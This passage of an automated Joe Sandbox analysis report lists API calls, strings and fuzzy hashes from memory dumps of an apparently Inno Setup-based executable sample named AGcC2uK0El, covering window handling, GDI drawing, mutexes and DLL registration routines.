                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveFocusIconicShow
                                                                                    • String ID:
                                                                                    • API String ID: 649377781-0
                                                                                    • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                    • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                    • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                    • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00417D1F
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Placement$Iconic
                                                                                    • String ID:
                                                                                    • API String ID: 568898626-0
                                                                                    • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                    • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                    • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                    • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CaptureIconic
                                                                                    • String ID:
                                                                                    • API String ID: 2277910766-0
                                                                                    • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                    • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                    • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                    • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 004241AB
                                                                                      • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                      • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                      • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                      • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                    • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                      • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2671590913-0
                                                                                    • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                    • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                    • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                    • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                    • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                                    • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                    • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                    • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                                    • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                                    • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                                    APIs
                                                                                    • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptFour
                                                                                    • String ID:
                                                                                    • API String ID: 2153018856-0
                                                                                    • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                    • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                                    • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                                    • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                                    APIs
                                                                                    • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptFour
                                                                                    • String ID:
                                                                                    • API String ID: 2153018856-0
                                                                                    • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                    • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                                    • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                                    • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3301473306.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3301442669.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3301494094.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_10000000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                    • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                    • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                    • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3301473306.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3301442669.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3301494094.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_10000000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                    • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                    • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                                    • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                                    • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                                    • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                                    • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                                    • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                    • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                    • API String ID: 4012871263-351310198
                                                                                    • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                    • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                                    • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                                    • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                    • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                    • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                    • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                    • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                    • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                    • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                    • API String ID: 2323315520-3614243559
                                                                                    • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                    • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                                    • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                                    • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                    • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                    • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                    • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                    • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                    • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                    • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                    • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                    • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                    • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                    • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                    • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                    • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                    • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                    • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                    • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                      • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                    • String ID:
                                                                                    • API String ID: 2377543522-0
                                                                                    • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                    • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                    • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                    • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                      • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                    • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                    • API String ID: 2000705611-3392794427
                                                                                    • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                    • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                                    • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                    • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
